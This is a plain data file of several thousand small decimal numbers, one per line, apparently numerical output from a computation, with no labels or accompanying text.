0.00166693
0.00166331
0.00166308
0.00165815
0.00165435
0.00165836
0.00165424
0.00165823
0.00165834
0.00165446
0.00166328
0.00166306
0.00165811
0.00165832
0.0016545
0.00165427
0.00165813
0.00165832
0.00165449
0.0016633
0.00166693
0.00166713
0.00166308
0.00166693
0.0016633
0.00166307
0.00165815
0.00165435
0.00165836
0.00165424
0.00165834
0.00165823
0.00165446
0.00166327
0.00166714
0.00166703
0.00166301
0.00166696
0.00166305
0.00166316
0.00165811
0.00165832
0.0016545
0.00165427
0.00165813
0.00165832
0.00165449
0.00166312
0.00166356
0.00166695
0.00166695
0.00166709
0.00166329
0.00166329
0.000769803
0.000769784
0.000769784
0.000771354
0.000736233
0.000771355
0.000741868
0.000769783
0.000769783
0.000743443
0.000743443
0.000771355
0.00074187
0.000769785
0.000769786
0.00074344
0.000743444
0.000769782
0.000743444
0.000743445
0.000771358
0.000741868
0.000769783
0.000743442
0.000743445
0.00074187
0.000734664
0.000734663
0.000758882
0.000771916
0.000758874
0.000771909
0.00077192
0.000758869
0.000758888
0.000771919
0.000758878
0.00077191
0.000769803
0.000769803
0.000769801
0.000743464
0.000743465
0.000743463
0.000743465
0.000758989
0.000771864
0.000769787
0.000761003
0.000758933
0.000761009
0.000771808
0.000771924
0.000758871
0.000758999
0.000769786
0.000771867
0.000761002
0.000761004
0.000758935
0.000771812
0.000771925
0.000771922
0.000759431
0.000758881
0.000758881
0.000736798
0.0007368
0.000771921
0.000758869
0.000771923
0.000758872
0.000771919
0.00077192
0.00075943
0.000758874
0.000758875
0.000741308
0.000754354
0.000741311
0.000754358
0.000753794
0.000741312
0.000741315
0.000754352
0.000754354
0.000758884
0.000771916
0.000758875
0.000771907
0.000758985
0.000771863
0.000769787
0.000761003
0.000758928
0.000761008
0.000771805
0.000758985
0.000771861
0.000769788
0.000761003
0.000758928
0.000761009
0.000771805
0.000754338
0.000741314
0.000754349
0.000741326
0.000754339
0.000741316
0.00075435
0.000741329
0.000754234
0.000752225
0.000741369
0.000743449
0.000754297
0.000752229
0.000741432
0.000754234
0.000752224
0.00074137
0.000743451
0.000754297
0.00075223
0.000741433
0.000771916
0.000771919
0.000759431
0.000758873
0.000758877
0.000771924
0.000758875
0.00074131
0.000754354
0.000753795
0.000741315
0.000741317
0.000754352
0.000754357
0.000741313
0.000754361
0.000758986
0.000771864
0.00076979
0.000761004
0.00075893
0.00076101
0.000771807
0.000758886
0.000771918
0.000758875
0.000771912
0.000758988
0.000769792
0.000771865
0.000761006
0.000761012
0.00075893
0.000771808
0.000754344
0.000741319
0.000754353
0.000741328
0.000754235
0.000752223
0.000741371
0.00074345
0.000754298
0.000752231
0.000741431
0.00075434
0.000741316
0.000754352
0.000741328
0.000754237
0.000752225
0.00074345
0.000741369
0.000752232
0.000754297
0.000741431
0.000758889
0.000771918
0.000758883
0.000771911
0.000758991
0.000769789
0.000771867
0.000761004
0.000761009
0.000758935
0.000771808
0.000758891
0.000771921
0.000758883
0.000771912
0.000754238
0.000752224
0.000741372
0.000743451
0.000754301
0.00075223
0.000741434
0.000754346
0.000741319
0.000754358
0.00074133
0.00075424
0.000752226
0.000743451
0.000741373
0.00075223
0.000754304
0.000741435
0.000754345
0.000741321
0.000754359
0.000741331
0.000771921
0.000771922
0.000759432
0.000758875
0.000758878
0.000771924
0.000758876
0.00074131
0.000754357
0.000753794
0.000741314
0.000741319
0.000754354
0.000754357
0.000741316
0.000754362
0.000758994
0.000769788
0.000771869
0.000761001
0.000761009
0.000758935
0.00077181
0.000758891
0.000771919
0.000758882
0.000771915
0.000758892
0.000771921
0.000758881
0.000771915
0.000754248
0.000752222
0.000743449
0.000741374
0.000752227
0.000754305
0.00074144
0.000754243
0.000752226
0.000743451
0.000741375
0.000752231
0.000754302
0.000741439
0.000754349
0.000741322
0.000754358
0.000741335
0.000754349
0.000741324
0.000754356
0.000741332
0.000771926
0.000758877
0.000771925
0.000758877
0.000753796
0.00074132
0.000741323
0.00075436
0.00075436
0.000741315
0.000754364
0.000741319
0.000754362
0.000734671
0.000736742
0.000736683
0.000736795
0.000736788
0.000736744
0.000736798
0.0007368
0.000736802
0.000763144
0.000758868
0.000758881
0.000763126
0.000763142
0.000763128
0.000758868
0.00076765
0.000767658
0.000771927
0.000767649
0.000771928
0.000763144
0.000758866
0.000763131
0.000763142
0.000758868
0.00076765
0.000767668
0.000771925
0.000771912
0.000767651
0.000767664
0.000771927
0.000767652
0.000763137
0.000763148
0.000758885
0.000758872
0.000763129
0.000763132
0.000763144
0.000758872
0.000767653
0.000767661
0.00077193
0.000767652
0.000771932
0.000763148
0.000758869
0.000763136
0.000763146
0.000758872
0.000767653
0.00076767
0.000771914
0.000771929
0.000767666
0.000767654
0.000771932
0.000767655
0.000763139
0.000763156
0.000758869
0.000758869
0.000763154
0.000763153
0.000758865
0.000767691
0.00077186
0.000767665
0.000771922
0.000767719
0.000767667
0.000771896
0.000767691
0.00077186
0.000767662
0.00077192
0.000767721
0.000767665
0.000771896
0.000763114
0.000758883
0.000763143
0.00075894
0.000763077
0.000763139
0.000758907
0.000763114
0.000758883
0.000763142
0.000758941
0.00076308
0.000763139
0.000758908
0.000767648
0.000771936
0.000771935
0.000767653
0.000767651
0.000771939
0.000732566
0.000736736
0.000736794
0.000732534
0.000736771
0.0007326
0.000732537
0.000732566
0.000736738
0.000736797
0.000732535
0.000736773
0.000732601
0.000732538
0.00073252
0.000736809
0.00073681
0.000736813
0.000732524
0.000732524
0.000767654
0.000763138
0.000767655
0.00076314
0.000763149
0.000758861
0.000758863
0.000763146
0.000763147
0.000758859
0.000767685
0.000771855
0.000767659
0.000771916
0.000767661
0.000767714
0.000771891
0.000767683
0.000771856
0.000767658
0.000771917
0.000767661
0.000767716
0.000771891
0.000763106
0.000758875
0.000763137
0.000758935
0.000763132
0.000758902
0.000763072
0.000763104
0.000758877
0.000763137
0.000758936
0.000763133
0.000758901
0.000763073
0.000767643
0.00077193
0.00077193
0.000767646
0.000767646
0.000771933
0.000745575
0.000750088
0.000745578
0.000750091
0.00075008
0.000754365
0.000754366
0.000754368
0.000750082
0.000750083
0.000745548
0.000741375
0.000745574
0.000741315
0.000745571
0.000745515
0.00074134
0.000745548
0.000741375
0.000745575
0.000741317
0.000745572
0.000745515
0.000741341
0.000750123
0.00075435
0.000754289
0.000750092
0.000754326
0.000750095
0.000750156
0.000750124
0.000754352
0.000754289
0.000750094
0.000754326
0.000750098
0.000750156
0.00074559
0.000741301
0.000741302
0.000745585
0.000745585
0.000741299
0.000763144
0.000758869
0.000758881
0.000763125
0.000763143
0.000763129
0.000758868
0.00076765
0.000767657
0.000771925
0.000767649
0.000771925
0.000763144
0.000758865
0.000763131
0.000763143
0.000758867
0.00076765
0.000767667
0.000771924
0.000771908
0.000767652
0.000767664
0.000771925
0.000750086
0.00075436
0.000754344
0.000750101
0.000754362
0.000750089
0.0007501
0.000745582
0.00074557
0.000741307
0.000741309
0.00074558
0.000750084
0.000754359
0.000750094
0.000754361
0.000750085
0.000745584
0.000745563
0.00074131
0.000741324
0.00074131
0.000745582
0.000745568
0.000750087
0.00075436
0.000754345
0.0007501
0.000754362
0.000750089
0.000750099
0.000745583
0.000745572
0.000741308
0.000745582
0.00074131
0.000750086
0.00075436
0.000750095
0.000754362
0.000750085
0.000745583
0.000745565
0.00074131
0.000741323
0.000745582
0.000745566
0.00074131
0.000763149
0.000758862
0.000758863
0.000763145
0.000763147
0.000758859
0.000767683
0.000771853
0.000767655
0.000771913
0.000767658
0.000767715
0.000771888
0.000767685
0.000771854
0.00076766
0.000771916
0.000767715
0.000767661
0.000771889
0.000763106
0.000758875
0.000763134
0.000758935
0.000763131
0.000763072
0.000758901
0.000763107
0.000758878
0.000763139
0.000758937
0.000763074
0.000763134
0.0007589
0.000767641
0.000771928
0.000771929
0.000767644
0.000767646
0.000771931
0.000767658
0.000763144
0.000745576
0.000750089
0.000750079
0.000754365
0.000754366
0.000754369
0.000750082
0.000750083
0.000745548
0.000741376
0.000745575
0.000741317
0.000745516
0.000745571
0.000741343
0.000745548
0.000741378
0.000745577
0.000741318
0.000745572
0.000745517
0.000741343
0.000750123
0.000754351
0.000754288
0.000750093
0.000750156
0.000754323
0.000750096
0.000750124
0.000754353
0.00075429
0.000750097
0.000754325
0.000750097
0.000750158
0.000745589
0.000741302
0.000741303
0.000745584
0.000745585
0.0007413
0.00074558
0.000750094
0.000763145
0.00075887
0.000758881
0.00076313
0.000763143
0.000763128
0.000758869
0.000767651
0.00076766
0.000771928
0.00076765
0.00077193
0.000763143
0.000758867
0.000763133
0.000763142
0.000758867
0.000767652
0.000767672
0.000771929
0.000771911
0.000767653
0.000767664
0.000771929
0.000750089
0.000754347
0.000754364
0.000750105
0.000754366
0.0007501
0.000750092
0.000745587
0.000745574
0.000741311
0.000741312
0.000745586
0.000750089
0.000754363
0.000750097
0.000754365
0.000750088
0.000745586
0.000745567
0.000741325
0.000741312
0.000741312
0.000745569
0.000745584
0.000750088
0.000754361
0.000754345
0.000750104
0.000754363
0.000750091
0.000750102
0.000745582
0.000745571
0.000741308
0.000745582
0.000741307
0.000750086
0.000754361
0.000750096
0.000754362
0.000750086
0.000745584
0.000745567
0.000741312
0.000741324
0.000745584
0.00074557
0.00074131
0.000763153
0.000758887
0.000758876
0.00076313
0.000763133
0.000763149
0.000758878
0.000767657
0.000767664
0.00077193
0.000767654
0.000771932
0.000763154
0.000758876
0.000763141
0.000763152
0.000758878
0.000767656
0.000767673
0.000771913
0.00077193
0.000767668
0.000767658
0.000771931
0.000763149
0.000758875
0.000758887
0.000763133
0.000763147
0.000763134
0.000758874
0.000767655
0.000767665
0.00077193
0.000767655
0.00077193
0.00076315
0.000758873
0.000763139
0.000763149
0.000758875
0.000767653
0.000767674
0.00077193
0.000771915
0.000767656
0.000767669
0.000771929
0.000750094
0.000754352
0.000754367
0.00075011
0.000754371
0.000750108
0.000750095
0.000745589
0.000745576
0.000741311
0.000745587
0.000741313
0.000750094
0.000754369
0.000750101
0.00075437
0.000750093
0.000745589
0.000745571
0.000741327
0.000741314
0.000745574
0.000745587
0.000741313
0.000750093
0.000754366
0.000754352
0.000750107
0.000754369
0.000750094
0.000750108
0.00074559
0.000745578
0.000741313
0.000745589
0.000741314
0.000750094
0.000754369
0.000750102
0.00075437
0.000750093
0.00074559
0.00074557
0.000741314
0.000741328
0.000745586
0.000745576
0.000741314
0.00076315
0.000758863
0.000758864
0.000763147
0.000763147
0.00075886
0.000767684
0.000771856
0.000767659
0.000771917
0.000767661
0.000767718
0.000771892
0.000767684
0.000771857
0.000767661
0.000771917
0.000767719
0.000767661
0.000771892
0.000763107
0.000758878
0.000763137
0.000758937
0.000763134
0.000763074
0.000758903
0.000763107
0.000758878
0.00076314
0.000758939
0.000763077
0.000763133
0.000758903
0.000767642
0.000771931
0.000771931
0.000767646
0.000767646
0.000771935
0.000767658
0.000763144
0.000745576
0.00075009
0.000750082
0.000754366
0.000754367
0.00075437
0.000750083
0.000750085
0.000745548
0.000741376
0.000745574
0.000741316
0.000745515
0.000745571
0.000741342
0.000745551
0.000741378
0.000745581
0.000741318
0.000745575
0.000745517
0.000741345
0.000750124
0.000754351
0.00075429
0.000750095
0.000750157
0.000754326
0.000750097
0.000750125
0.000754354
0.000754292
0.000750099
0.000754326
0.000750101
0.000750158
0.00074559
0.000741301
0.000741303
0.000745585
0.000745587
0.000741299
0.000745582
0.000750096
0.00076315
0.000758887
0.000758877
0.000763131
0.000763135
0.000763148
0.000758875
0.000767656
0.000767664
0.000771931
0.000767656
0.000771931
0.000763152
0.000758875
0.00076314
0.000763151
0.000758876
0.000767655
0.000767675
0.000771919
0.000771931
0.000767672
0.000767657
0.000771931
0.00076315
0.000758886
0.000758877
0.000763134
0.000763135
0.000763149
0.000758874
0.000767657
0.000767665
0.000771933
0.000767656
0.000771935
0.000763151
0.000758872
0.00076314
0.000763149
0.000758874
0.000767656
0.000767675
0.000771918
0.000771932
0.000767672
0.000767657
0.000771933
0.000750094
0.00075435
0.000754367
0.000750112
0.000754369
0.000750106
0.000750094
0.000745591
0.000745577
0.000741313
0.00074559
0.000741315
0.000750095
0.000754371
0.000750102
0.000754371
0.000750095
0.000745589
0.000745571
0.000741327
0.000741316
0.000745572
0.000745587
0.000741315
0.000750093
0.00075435
0.000754368
0.00075011
0.000754367
0.000750107
0.000750095
0.00074559
0.00074558
0.000741315
0.000745588
0.000741316
0.000750093
0.000754364
0.000750102
0.000754367
0.000750092
0.00074559
0.000745569
0.000741332
0.000741317
0.000745575
0.000745588
0.000741317
0.000767661
0.000763145
0.000767659
0.000763144
0.000750086
0.000754372
0.000754372
0.000754375
0.000750089
0.000750089
0.000745552
0.000741381
0.000745581
0.000741321
0.000741348
0.000745519
0.000745577
0.000745552
0.000741381
0.000745583
0.000741325
0.000741349
0.00074552
0.000745578
0.000750128
0.000754358
0.000754293
0.0007501
0.00075433
0.000750159
0.000750103
0.000750128
0.000754358
0.000754294
0.0007501
0.000754331
0.000750161
0.000750103
0.000745595
0.000741307
0.000741309
0.000741305
0.000745591
0.000745591
0.000745583
0.000750097
0.000745585
0.000750096
0.000732529
0.000736807
0.000732535
0.000736808
0.000732529
0.000732528
0.000732548
0.000736805
0.000736791
0.000736806
0.000732529
0.000732543
0.000732537
0.00073253
0.000732532
0.000769796
0.000769796
0.000761023
0.000761017
0.000761017
0.000761012
0.000769791
0.000767812
0.000771609
0.000771611
0.000768205
0.000767964
0.000767966
0.000771771
0.000732696
0.000736489
0.000736488
0.000733091
0.000736651
0.000732851
0.000732852
0.000767808
0.000771605
0.000771608
0.000768205
0.000767962
0.000767966
0.000771766
0.000745424
0.000745019
0.000741625
0.000741623
0.000745268
0.000745269
0.000741464
0.000767808
0.000771608
0.000771606
0.000768205
0.000767963
0.000767965
0.000771765
0.000745427
0.000745021
0.000741627
0.000741627
0.000745272
0.000745274
0.000741467
0.000767811
0.00077161
0.000771611
0.000768209
0.000767968
0.000767969
0.000771768
0.000745426
0.00074502
0.000741626
0.000741623
0.000745271
0.00074527
0.000741466
0.000745431
0.000745023
0.00074163
0.000741629
0.000741474
0.000745275
0.000745276
0.000769795
0.000769795
0.000761023
0.000761017
0.000761017
0.000761012
0.000769791
0.000769797
0.000769796
0.000761024
0.000761018
0.000761017
0.000761013
0.000769792
0.000769796
0.000769795
0.000761022
0.000761017
0.000761017
0.000761012
0.000769791
0.000752244
0.00074346
0.000743458
0.000752239
0.000752239
0.000752236
0.000743458
0.000752244
0.000743461
0.000743461
0.00075224
0.000752239
0.000752237
0.000743459
0.000752244
0.000743458
0.000743459
0.000752239
0.00075224
0.000752237
0.000743458
0.000752244
0.00074346
0.00074346
0.000752239
0.00075224
0.000752237
0.000743459
0.000762807
0.000758982
0.000759193
0.000763029
0.000763032
0.000762812
0.000759194
0.00076795
0.000771714
0.000767713
0.000771833
0.00076785
0.00076775
0.000771624
0.000762838
0.000758968
0.000763084
0.000759072
0.000762932
0.000763053
0.000759161
0.000767983
0.000767774
0.000771814
0.00077159
0.000767769
0.000767976
0.000771592
0.000762811
0.0007592
0.000758992
0.000763036
0.000762817
0.00076304
0.000759202
0.00076795
0.000771715
0.000767715
0.000771838
0.000767852
0.000767751
0.000771627
0.000762841
0.000758971
0.000763086
0.000759076
0.000762934
0.000763054
0.000759167
0.000767984
0.000767779
0.000771591
0.000771824
0.00076798
0.000767775
0.000771594
0.000762988
0.000762575
0.00075919
0.000759189
0.000762829
0.000762831
0.000759031
0.000762985
0.000762576
0.000759187
0.000759188
0.000759027
0.000762827
0.000762832
0.000750249
0.00075065
0.000754043
0.000754045
0.000754201
0.000750408
0.000750407
0.000762808
0.00075898
0.000759194
0.000763025
0.000763031
0.000762809
0.000759195
0.000767946
0.000771711
0.000767709
0.000771828
0.000767744
0.000767846
0.00077162
0.00076284
0.000758962
0.00076308
0.00075907
0.000763048
0.000762931
0.000759163
0.00076798
0.00076777
0.000771811
0.000771587
0.000767764
0.000767974
0.000771589
0.000762805
0.000758981
0.000759192
0.000763023
0.000763028
0.000762809
0.000759195
0.000767945
0.000771711
0.000767709
0.000771829
0.000767743
0.000767849
0.000771621
0.000762837
0.000758963
0.000763079
0.00075907
0.000763046
0.000759163
0.000762931
0.000767979
0.000767769
0.000771811
0.000771588
0.000767762
0.000767975
0.000771591
0.000750421
0.000754244
0.000754024
0.000750204
0.000754025
0.000750201
0.000750415
0.000745285
0.000741512
0.000745521
0.000741405
0.000745377
0.000745491
0.000741604
0.000750391
0.000754265
0.00075415
0.000750148
0.000750292
0.000754062
0.000750184
0.000745249
0.000745468
0.000741424
0.000741642
0.000745472
0.000745258
0.000741637
0.000750422
0.000754246
0.000754023
0.000750205
0.000754025
0.000750202
0.000750416
0.000745282
0.000741512
0.000745522
0.000741406
0.000745491
0.000745376
0.000741602
0.00075039
0.000754266
0.000754149
0.000750149
0.000754061
0.000750185
0.000750293
0.00074525
0.000745469
0.000741424
0.000741639
0.000745473
0.000745257
0.000741636
0.000762984
0.000762574
0.000759188
0.000759189
0.000762828
0.000762827
0.000759026
0.000750251
0.000750652
0.000754045
0.000754046
0.00075041
0.000754201
0.00075041
0.000762806
0.00075898
0.000759191
0.000763028
0.00076303
0.000762811
0.000759192
0.000767946
0.000771713
0.000767711
0.000771831
0.000767745
0.000767849
0.000771622
0.000762838
0.000758963
0.000763081
0.00075907
0.000763046
0.000762931
0.000759162
0.000767981
0.000767773
0.000771813
0.000771591
0.000767766
0.000767977
0.00077159
0.00076281
0.000759193
0.000758981
0.000763028
0.00076281
0.00076303
0.000759197
0.00076795
0.000771714
0.000767712
0.000771835
0.000767748
0.000767851
0.000771625
0.000762841
0.000758964
0.00076308
0.000759072
0.000763048
0.000759164
0.000762932
0.000767984
0.000767774
0.00077159
0.000771816
0.000767976
0.000767768
0.000771594
0.000750422
0.000754244
0.000754022
0.000750203
0.000754024
0.000750201
0.000750412
0.000745279
0.000741509
0.000745522
0.000741405
0.000745375
0.000745489
0.000741599
0.000750389
0.000754264
0.000754148
0.00075015
0.000750292
0.000754059
0.000750184
0.000745247
0.000745467
0.000741422
0.000741637
0.000745471
0.000745255
0.000741634
0.000750421
0.000754026
0.000754245
0.000750205
0.000754026
0.000750413
0.000750202
0.000745282
0.000741509
0.000745521
0.000741404
0.000745491
0.000745375
0.000741602
0.000750392
0.000754265
0.000754148
0.00075015
0.000754061
0.000750186
0.000750292
0.000745248
0.000745467
0.000741638
0.000741425
0.000745255
0.000745473
0.000741636
0.000762811
0.000759193
0.000758987
0.000763032
0.000762811
0.000763038
0.000759197
0.000767948
0.000771715
0.000767715
0.000771835
0.00076785
0.00076775
0.000771624
0.000762843
0.00075897
0.000763087
0.000759074
0.000762936
0.000763055
0.000759166
0.000767984
0.000767775
0.00077159
0.000771818
0.000767975
0.000767772
0.000771593
0.000750418
0.000754248
0.000754024
0.000750206
0.000754023
0.000750204
0.000750411
0.00074528
0.000741512
0.000745524
0.000741407
0.000741603
0.000745377
0.000745492
0.000750388
0.000754269
0.00075415
0.000750152
0.000754059
0.000750293
0.000750187
0.000745246
0.000745469
0.000741426
0.00074164
0.000741636
0.000745473
0.000745255
0.00075042
0.000754026
0.00075425
0.000750208
0.000754026
0.000750416
0.000750204
0.000745283
0.000741512
0.000745527
0.000741407
0.000745494
0.000745378
0.000741603
0.00075039
0.000754271
0.000754152
0.000750155
0.000754062
0.000750189
0.000750294
0.000745248
0.000745471
0.00074164
0.000741427
0.000745258
0.000745476
0.000741637
0.000762986
0.000762577
0.00075919
0.00075919
0.000762831
0.00076283
0.000759028
0.000750251
0.000750651
0.000754046
0.000754047
0.00075041
0.000754203
0.000750408
0.000762811
0.000759197
0.000758989
0.000763034
0.000762815
0.000763038
0.000759201
0.00076795
0.000771718
0.000767716
0.000771836
0.000767855
0.000767752
0.000771623
0.000762844
0.000758972
0.000763087
0.000759076
0.000762938
0.000763059
0.000759168
0.000767983
0.000767777
0.000771591
0.000771816
0.000767979
0.000767771
0.000771591
0.000750424
0.000754028
0.000754252
0.000750217
0.000754029
0.000750417
0.000750207
0.000745284
0.000741512
0.000745527
0.000741411
0.000741607
0.000745377
0.000745496
0.000750392
0.000754275
0.000754154
0.000750156
0.000754062
0.000750296
0.000750193
0.000745252
0.000745476
0.000741643
0.00074143
0.000741642
0.000745261
0.000745476
0.000750427
0.000754027
0.000754253
0.000750212
0.000754032
0.000750418
0.000750208
0.000745286
0.000741513
0.000745527
0.000741409
0.000745493
0.000745378
0.000741606
0.000750394
0.000754269
0.000754152
0.000750154
0.000754066
0.000750188
0.000750296
0.000745254
0.000745475
0.000741646
0.000741431
0.000745264
0.00074548
0.000741641
0.000750254
0.000750652
0.000754048
0.000754048
0.000754206
0.000750411
0.000750412
0.000732831
0.000736593
0.00073671
0.000732591
0.000732736
0.000736501
0.000732628
0.000732866
0.000732654
0.000736466
0.000736691
0.00073286
0.00073647
0.000732648
0.000736593
0.000732593
0.000732738
0.00164756
0.00164752
0.00164753
0.0016491
0.00161237
0.00161235
0.00161235
0.00161391
0.00157724
0.00157722
0.00157722
0.00157879
0.00154214
0.00154212
0.00154213
0.00154369
0.00150705
0.00150704
0.00150703
0.0015086
0.00147196
0.00147194
0.00147194
0.00147353
0.00143688
0.00143686
0.00143686
0.00143843
0.00140179
0.00140177
0.00140177
0.00140334
0.00136671
0.00136669
0.00136669
0.00136827
0.00133164
0.00133162
0.00133162
0.00133319
0.00129656
0.00129654
0.00129654
0.00129811
0.00126147
0.00126145
0.00126145
0.00126302
0.00122638
0.00122636
0.00122636
0.00122793
0.00119128
0.00119126
0.00119126
0.00119283
0.00115617
0.00115615
0.00115616
0.00115773
0.00112106
0.00112104
0.00112104
0.00112262
0.00108595
0.00108593
0.00108592
0.0010875
0.00105083
0.00105081
0.00105081
0.00105238
0.00101571
0.00101569
0.00101568
0.00101726
0.000980583
0.000980562
0.000980557
0.000982133
0.000945452
0.000945429
0.000945432
0.000947004
0.000910319
0.000910301
0.000910301
0.000911872
0.000875188
0.000875167
0.00087517
0.000876742
0.000840059
0.000840039
0.000840041
0.000841611
0.00080493
0.000804909
0.000804912
0.000806483
0.0016491
0.00161955
0.00164753
0.00164753
0.00162114
0.00162114
0.00164909
0.00161955
0.00164753
0.00164753
0.00162114
0.00162114
0.00164753
0.00162114
0.00162114
0.0016491
0.00161955
0.00164753
0.00162114
0.00162113
0.00161955
0.00161391
0.00158442
0.00161235
0.00161235
0.001586
0.001586
0.00161392
0.00158442
0.00161235
0.00161235
0.001586
0.001586
0.00161235
0.001586
0.001586
0.00161391
0.00158442
0.00161235
0.001586
0.001586
0.00158442
0.00157879
0.00154932
0.00157722
0.00157723
0.0015509
0.0015509
0.00157879
0.00154932
0.00157723
0.00157722
0.0015509
0.0015509
0.00157722
0.0015509
0.00155089
0.00157879
0.00154932
0.00157722
0.0015509
0.0015509
0.00154932
0.00154369
0.00151423
0.00154213
0.00154212
0.0015158
0.0015158
0.00154369
0.00151423
0.00154212
0.00154212
0.0015158
0.0015158
0.00154212
0.00151581
0.0015158
0.00154369
0.00151422
0.00154212
0.0015158
0.0015158
0.00151423
0.00150859
0.00147914
0.00150703
0.00150703
0.00148071
0.00148072
0.0015086
0.00147914
0.00150703
0.00150703
0.00148072
0.00148072
0.00150703
0.00148071
0.00148072
0.0015086
0.00147914
0.00150703
0.00148071
0.00148072
0.00147915
0.00147351
0.00144406
0.00147195
0.00147195
0.00144563
0.00144563
0.00147351
0.00144406
0.00147195
0.00147194
0.00144563
0.00144563
0.00147195
0.00144564
0.00144563
0.00147351
0.00144406
0.00147195
0.00144563
0.00144563
0.00144407
0.00143843
0.00140897
0.00143686
0.00143686
0.00141054
0.00141054
0.00143843
0.00140897
0.00143686
0.00143686
0.00141054
0.00141054
0.00143686
0.00141054
0.00141054
0.00143843
0.00140897
0.00143686
0.00141054
0.00141054
0.00140897
0.00140334
0.00137389
0.00140177
0.00140177
0.00137546
0.00137546
0.00140334
0.00137389
0.00140177
0.00140177
0.00137546
0.00137547
0.00140177
0.00137546
0.00137546
0.00140334
0.00137389
0.00140177
0.00137546
0.00137547
0.00137389
0.00136826
0.00133881
0.00136669
0.00136669
0.00134039
0.00134039
0.00136826
0.00133882
0.00136669
0.0013667
0.00134039
0.00134039
0.0013667
0.00134039
0.00134039
0.00136827
0.00133882
0.0013667
0.00134039
0.00134039
0.00133882
0.00133318
0.00130374
0.00133162
0.00133163
0.00130531
0.00130531
0.00133319
0.00130374
0.00133162
0.00133162
0.00130531
0.00130531
0.00133162
0.00130531
0.00130531
0.00133319
0.00130374
0.00133163
0.00130531
0.00130531
0.00130374
0.00129811
0.00126866
0.00129654
0.00129654
0.00127023
0.00127023
0.00129811
0.00126865
0.00129654
0.00129654
0.00127023
0.00127023
0.00129654
0.00127022
0.00127023
0.00129811
0.00126865
0.00129654
0.00127023
0.00127022
0.00126866
0.00126303
0.00123356
0.00126145
0.00126145
0.00123513
0.00123513
0.00126302
0.00123356
0.00126146
0.00126145
0.00123513
0.00123513
0.00126145
0.00123513
0.00123513
0.00126302
0.00123356
0.00126145
0.00123513
0.00123513
0.00123356
0.00122793
0.00119846
0.00122636
0.00122636
0.00120004
0.00120003
0.00122793
0.00119846
0.00122636
0.00122636
0.00120004
0.00120004
0.00122636
0.00120003
0.00120003
0.00122793
0.00119846
0.00122636
0.00120004
0.00120004
0.00119847
0.00119283
0.00116336
0.00119126
0.00119126
0.00116493
0.00116493
0.00119283
0.00116336
0.00119126
0.00119126
0.00116493
0.00116493
0.00119126
0.00116493
0.00116493
0.00119283
0.00116336
0.00119126
0.00116493
0.00116493
0.00116336
0.00115772
0.00112825
0.00115615
0.00115615
0.00112982
0.00112982
0.00115772
0.00112825
0.00115615
0.00115616
0.00112982
0.00112982
0.00115616
0.00112982
0.00112982
0.00115773
0.00112825
0.00115615
0.00112982
0.00112982
0.00112825
0.00112261
0.00109313
0.00112104
0.00112104
0.00109471
0.0010947
0.00112261
0.00109313
0.00112104
0.00112104
0.00109471
0.0010947
0.00112104
0.00109471
0.0010947
0.00112261
0.00109313
0.00112104
0.0010947
0.0010947
0.00109313
0.0010875
0.00105802
0.00108593
0.00108593
0.00105959
0.00105959
0.0010875
0.00105802
0.00108593
0.00108592
0.00105959
0.00105959
0.00108592
0.00105959
0.00105958
0.0010875
0.00105801
0.00108592
0.00105959
0.00105959
0.00105801
0.00105238
0.0010229
0.00105081
0.00105081
0.00102447
0.00102447
0.00105238
0.0010229
0.00105081
0.00105081
0.00102447
0.00102446
0.0010508
0.00102447
0.00102447
0.00105238
0.00102289
0.0010508
0.00102447
0.00102447
0.0010229
0.00101726
0.000987771
0.00101569
0.00101569
0.000989345
0.000989347
0.00101726
0.000987772
0.00101569
0.00101568
0.000989344
0.00098934
0.00101568
0.000989346
0.000989339
0.00101726
0.000987772
0.00101569
0.00098934
0.000989343
0.000987769
0.000982134
0.000952642
0.000980563
0.000980565
0.000954214
0.000954214
0.000982135
0.00095264
0.000980561
0.000980558
0.000954214
0.000954214
0.000980555
0.00095421
0.000954213
0.000982134
0.000952639
0.00098056
0.000954217
0.000954212
0.000952642
0.000947005
0.00091751
0.000945432
0.00094543
0.000919083
0.00091908
0.000947002
0.00091751
0.000945432
0.000945431
0.000919083
0.000919081
0.000945429
0.000919084
0.000919082
0.000947001
0.000917509
0.00094543
0.000919084
0.000919081
0.000917509
0.000911873
0.000882377
0.000910301
0.000910301
0.000883951
0.000883951
0.000911874
0.000882376
0.0009103
0.000910296
0.000883952
0.00088395
0.000910298
0.000883951
0.000883951
0.000911871
0.000882379
0.000910297
0.000883954
0.000883952
0.00088238
0.00087674
0.000847247
0.000875166
0.000875167
0.00084882
0.00084882
0.000876738
0.000847247
0.000875169
0.00087517
0.000848821
0.000848825
0.000875167
0.000848819
0.000848819
0.000876742
0.00084725
0.000875171
0.000848821
0.000848823
0.00084725
0.00084161
0.000812116
0.000840036
0.000840038
0.00081369
0.00081369
0.00084161
0.000812116
0.000840039
0.000840042
0.000813692
0.000813694
0.000840039
0.000813691
0.000813692
0.000841614
0.000812121
0.000840039
0.000813694
0.000813692
0.000812121
0.00080648
0.000776993
0.000804909
0.000804907
0.000778564
0.000778563
0.000806479
0.000776992
0.000804907
0.000804913
0.000778566
0.000778567
0.000804909
0.000778564
0.000778563
0.000806484
0.000776995
0.000804909
0.000778566
0.000778564
0.000776992
0.00163654
0.0016496
0.00163653
0.00164959
0.0016496
0.00163653
0.00163655
0.0016496
0.00163653
0.00164959
0.00164755
0.00164755
0.00164755
0.00162116
0.00162116
0.00162116
0.00162116
0.00163666
0.00164955
0.00164754
0.00163872
0.0016366
0.00163874
0.0016495
0.0016496
0.00163652
0.00163666
0.00164754
0.00164955
0.00163872
0.00163874
0.00163659
0.0016495
0.0016496
0.0016496
0.00163714
0.00163653
0.00163653
0.00160139
0.00161442
0.00161441
0.00160138
0.00161442
0.00160138
0.00160139
0.00161442
0.00161441
0.00160138
0.00161237
0.00161237
0.00161237
0.00158602
0.00158602
0.00158602
0.00158602
0.00160151
0.00161437
0.00161236
0.00160356
0.00161433
0.00160144
0.00160358
0.00161442
0.00160137
0.00160151
0.00161237
0.00161437
0.00160356
0.00161432
0.00160358
0.00160144
0.00161443
0.00161443
0.00160198
0.00160138
0.00160138
0.00156628
0.0015793
0.0015793
0.00156627
0.00157931
0.00156627
0.00156628
0.0015793
0.00157929
0.00156628
0.00157724
0.00157724
0.00157724
0.00155091
0.00155092
0.00155092
0.00155092
0.00156639
0.00157925
0.00157724
0.00156845
0.00157921
0.00156634
0.00156846
0.0015793
0.00156627
0.00156641
0.00157724
0.00157926
0.00156845
0.00157921
0.00156846
0.00156634
0.00157931
0.00157931
0.00156687
0.00156628
0.00156628
0.0015312
0.00154421
0.0015442
